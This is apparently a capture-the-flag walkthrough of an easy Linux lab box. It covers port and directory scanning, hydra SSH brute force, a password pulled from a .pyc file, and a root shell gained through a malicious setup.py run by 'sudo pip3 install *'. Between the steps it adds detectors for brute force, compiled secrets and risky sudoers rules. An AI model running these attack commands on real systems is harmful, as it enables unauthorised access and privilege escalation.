Box Info #
OS | Difficulty |
---|---|
Linux | Easy |
Nmap #
[root@kali] /home/kali/pkgpoison
❯ nmap 172.17.0.2 -sV -A -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 03:57 EDT
Nmap scan report for 172.17.0.2
Host is up (0.000057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 2f:87:50:66:15:23:d6:c3:90:3f:ea:8c:a4:4b:b3:ff (RSA)
| 256 d1:35:c1:82:09:e8:c2:c7:cd:98:89:61:c2:6b:14:64 (ECDSA)
|_ 256 dd:01:45:ce:bd:a3:05:21:5b:31:4c:2f:df:38:c4:f6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: 404 Not Found
|_http-server-header: Apache/2.4.41 (Ubuntu)
Feroxbuster #
[root@kali] /home/kali/pkgpoison
❯ feroxbuster -u 'http://172.17.0.2/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://172.17.0.2/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 308c http://172.17.0.2/notes => http://172.17.0.2/notes/
200 GET 5l 24w 177c http://172.17.0.2/notes/note.txt
200 GET 5094l 30782w 2832734c http://172.17.0.2/index.png
200 GET 26l 51w 589c http://172.17.0.2/
[####################] - 17s 661647/661647 0s found:4 errors:3422
[####################] - 16s 661638/661638 40447/s http://172.17.0.2/
[####################] - 0s 661638/661638 330819000/s http://172.17.0.2/notes/ => Directory listing (add --scan-dir-listings to scan)
A note.txt is found:
[root@kali] /home/kali/pkgpoison
❯ curl http://172.17.0.2/notes/note.txt
Dear developer,
Please remember to change your credentials "dev:developer123" to something stronger.
I've already warned you that weak passwords can get us compromised.
-Admin
Hydra #
The credentials in the note do not log in directly, but the username can be used for a brute-force attempt:
[root@kali] /home/kali/pkgpoison
❯ hydra -l dev -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-31 04:01:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: dev password: computer
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-31 04:02:22
The password is computer.
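From the defender's side, the hydra run above leaves a very recognisable trace in sshd's log: a burst of failed password logins for one account from one source, followed by an accepted one. The following is an added example (not part of the writeup) that detects that pattern in syslog-style sshd lines; the log lines, hostname and source address 172.17.0.1 are constructed samples, and the threshold of 5 failures is an arbitrary choice.

```python
# Added example (not from the writeup): flag SSH password brute-forcing in sshd
# auth logs, including the "accepted after many failures" pattern that a run like
# the hydra one above produces. All log lines below are constructed samples.
import re
from collections import defaultdict

# Matches both "Failed password for dev from ..." and "Failed password for invalid user x from ...".
SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d+(?:\.\d+){3}) port \d+"
)

# Constructed sample: six failures from one source (two accounts), then a success for dev,
# plus an unrelated key-based admin login that must not be flagged.
SAMPLE_LOG = [
    "May 31 04:02:01 pkgpoison sshd[1201]: Failed password for dev from 172.17.0.1 port 51002 ssh2",
    "May 31 04:02:01 pkgpoison sshd[1203]: Failed password for dev from 172.17.0.1 port 51004 ssh2",
    "May 31 04:02:02 pkgpoison sshd[1205]: Failed password for dev from 172.17.0.1 port 51006 ssh2",
    "May 31 04:02:02 pkgpoison sshd[1207]: Failed password for dev from 172.17.0.1 port 51008 ssh2",
    "May 31 04:02:03 pkgpoison sshd[1209]: Failed password for invalid user test from 172.17.0.1 port 51010 ssh2",
    "May 31 04:02:03 pkgpoison sshd[1211]: Failed password for dev from 172.17.0.1 port 51012 ssh2",
    "May 31 04:02:22 pkgpoison sshd[1213]: Accepted password for dev from 172.17.0.1 port 51014 ssh2",
    "May 31 04:10:00 pkgpoison sshd[1300]: Accepted publickey for admin from 10.0.0.5 port 40000 ssh2",
]


def audit_ssh_auth(lines, threshold=5):
    """Return findings: one 'brute_force' per source over the threshold, plus every
    'success_after_failures' login that came after that source had already crossed it."""
    failures = defaultdict(int)   # src -> failed login count
    users = defaultdict(set)      # src -> accounts tried
    successes = []
    for line in lines:
        m = SSHD_RE.search(line)
        if not m:
            continue
        src, user = m["src"], m["user"]
        if m["result"] == "Failed":
            failures[src] += 1
            users[src].add(user)
        elif failures.get(src, 0) >= threshold:
            # A success from a source that was just hammering us is the real alarm.
            successes.append({"kind": "success_after_failures", "src": src,
                              "user": user, "failures": failures[src]})
    findings = [
        {"kind": "brute_force", "src": src, "failures": n, "users": sorted(users[src])}
        for src, n in sorted(failures.items()) if n >= threshold
    ]
    return findings + successes


if __name__ == "__main__":
    for f in audit_ssh_auth(SAMPLE_LOG):
        print(f)
```

The count-based rule is deliberately simple; in production you would bound it by a time window and feed it from the live journal, but the "success after N failures" finding is the one worth paging on, since it means the guessed password worked.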
Own admin #
There is a .pyc file under /opt:
dev@2f7ae8d2f272:/opt/scripts/__pycache__$ ll
total 12
drwxr-xr-x 2 root root 4096 May 24 20:25 ./
drwxr-xr-x 3 root root 4096 May 24 21:04 ../
-rw-r--r-- 1 admin admin 274 May 24 20:25 secret.cpython-38.pyc
dev@2f7ae8d2f272:/opt/scripts/__pycache__$
Download it:
dev@2f7ae8d2f272:/opt/scripts/__pycache__$ python3 -m http.server
[root@kali] /home/kali/pkgpoison
❯ wget 172.17.0.2:8000/secret.cpython-38.pyc
--2025-05-31 04:05:39-- http://172.17.0.2:8000/secret.cpython-38.pyc
Connecting to 172.17.0.2:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 274 [application/x-python-code]
Saving to: ‘secret.cpython-38.pyc’
secret.cpython-38.pyc 100%[===================================================================>] 274 --.-KB/s in 0s
2025-05-31 04:05:39 (68.1 MB/s) - ‘secret.cpython-38.pyc’ saved [274/274]
The decompiled result:
# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8
def auth():
    username = 'admin'
    password = 'p@$$w0r8321'
    print('Authenticating...')
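A full decompiler was not actually needed to recover that password: a .pyc is a 16-byte header followed by a marshalled code object, and string literals sit in plain view in the code object's constants. The following is an added example (not from the writeup) that parses that layout and reports string literals assigned to credential-looking names, which is also how a pre-commit or artifact scan can catch secrets compiled into bytecode. It compiles the recovered auth() source with the running interpreter, so it reads bytecode of the interpreter's own version; a real secret.cpython-38.pyc must be loaded under Python 3.8 because marshal formats and magic numbers differ between versions. The list of sensitive names is an assumption.

```python
# Added example (not from the writeup): find hard-coded credentials in a .pyc by
# walking the marshalled code object instead of decompiling it.
import dis
import importlib.util
import marshal
import struct
import types

# Assumed list of variable names whose string assignments are worth reporting.
SENSITIVE_NAMES = ("password", "passwd", "pwd", "secret", "token", "api_key")

# Constructed sample: the logic the writeup recovered from secret.cpython-38.pyc.
SAMPLE_SOURCE = """
def auth():
    username = 'admin'
    password = 'p@$$w0r8321'
    print('Authenticating...')
"""


def build_pyc(source: str, filename: str = "secret.py") -> bytes:
    """Compile source into the on-disk .pyc layout: magic, flags, mtime, size, marshal."""
    code = compile(source, filename, "exec")
    # flags=0 means timestamp-based invalidation; mtime and size do not matter here.
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, 0)
    return header + marshal.dumps(code)


def load_pyc(data: bytes) -> types.CodeType:
    """Parse a .pyc written by the same interpreter version that is running now."""
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("pyc magic does not match this interpreter; load it under the matching Python")
    return marshal.loads(data[16:])


def find_hardcoded_secrets(code: types.CodeType):
    """Return (function, variable, value) for every string literal stored straight into a sensitive name."""
    findings = []
    last_const = None
    for ins in dis.get_instructions(code):
        if ins.opname == "LOAD_CONST":
            last_const = ins.argval if isinstance(ins.argval, str) else None
        elif ins.opname in ("STORE_FAST", "STORE_NAME", "STORE_GLOBAL", "STORE_ATTR", "STORE_DEREF"):
            name = str(ins.argval)
            if last_const is not None and any(k in name.lower() for k in SENSITIVE_NAMES):
                findings.append((code.co_name, name, last_const))
            last_const = None
        else:
            last_const = None  # only a literal immediately followed by a store counts
    # Nested functions, classes and lambdas are code objects inside co_consts.
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            findings.extend(find_hardcoded_secrets(const))
    return findings


if __name__ == "__main__":
    for func, name, value in find_hardcoded_secrets(load_pyc(build_pyc(SAMPLE_SOURCE))):
        print(f"{func}(): {name} = {value!r}")
```

The immediate LOAD_CONST/STORE pairing keeps false positives low (a password built at runtime from an environment variable is not reported), which is the right trade-off for a scanner that should fail a build only on a literal.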
Root #
Check sudo:
admin@2f7ae8d2f272:~$ sudo -l
Matching Defaults entries for admin on 2f7ae8d2f272:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on 2f7ae8d2f272:
(ALL) NOPASSWD: /usr/bin/pip3 install *
The admin user can install arbitrary Python packages as root. pip runs a package's setup.py during installation, so pointing it at a local directory containing a malicious setup.py executes that code as root:
admin@2f7ae8d2f272:~$ TF=$(mktemp -d)
admin@2f7ae8d2f272:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
admin@2f7ae8d2f272:~$ sudo /usr/bin/pip3 install $TF
Processing /tmp/tmp.ZzA2ZH9Ziz
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
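The rule that made this possible combines three things an auditor should look for: a NOPASSWD tag, a wildcard in the command's arguments, and a binary that executes code from its argument (pip runs setup.py of whatever directory it is given). The following is an added example (not part of the writeup) that parses sudoers rules and scores them on those properties; the sample rules, the short CODE_EXEC_COMMANDS table and the constrained pip rule shown as a safer alternative are constructed assumptions, and the parser handles the sudoers file syntax rather than the output of sudo -l.

```python
# Added example (not from the writeup): audit sudoers rules for the pattern
# exploited above: a wildcard or unconstrained argument handed to a binary that
# will execute attacker-supplied code, optionally without a password prompt.
import re

# Assumed, short table of binaries that run code taken from their argument.
CODE_EXEC_COMMANDS = {
    "/usr/bin/pip3": "pip install <path> executes the package's setup.py as the invoking user",
    "/usr/bin/pip": "pip install <path> executes the package's setup.py as the invoking user",
    "/usr/bin/python3": "python3 runs whatever script or -c argument it is given",
}

# user host=(runas) TAG: command args    (runas and tags are optional)
SUDOERS_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<command>.+)$"
)

# Constructed sample /etc/sudoers.d file: the rule from the box, two benign fixed
# commands, an unconstrained package manager, and a constrained pip alternative
# (root-owned requirements file, wheels only, so no setup.py ever runs).
SAMPLE_SUDOERS = [
    "# constructed sample",
    "admin ALL=(ALL) NOPASSWD: /usr/bin/pip3 install *",
    "backup ALL=(root) /usr/bin/rsync -a /srv/data/ /mnt/backup/",
    "deploy ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart myapp",
    "ops ALL=/usr/bin/apt-get",
    "admin ALL=(ALL) /usr/bin/pip3 install --only-binary :all: -r /opt/requirements.txt",
]


def audit_sudoers(lines):
    """Return (user, command, severity, reasons) for rules that let the user choose arguments."""
    findings = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        cmd = m["command"].strip()
        binary, _, args = cmd.partition(" ")
        reasons = []
        if not args:
            reasons.append("unconstrained arguments")   # sudo allows any argv for a bare command
        elif any(ch in args for ch in "*?["):
            reasons.append("wildcard argument")
        if not reasons:
            continue  # a fixed argument list is exactly what the user may run, nothing more
        severity = "medium"
        if binary in CODE_EXEC_COMMANDS:
            severity = "high"
            reasons.append(CODE_EXEC_COMMANDS[binary])
        if "NOPASSWD" in m["tags"]:
            reasons.append("NOPASSWD")
        findings.append((m["user"], cmd, severity, reasons))
    return findings


if __name__ == "__main__":
    for user, cmd, severity, reasons in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{severity}] {user}: {cmd}\n    " + "\n    ".join(reasons))
```

The fixed-argument rules pass because sudo then matches argv exactly, which is the cheapest fix for the rule on this box: name the requirements file and forbid source distributions instead of granting install *.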
Summary #
A very simple box; nothing more to add.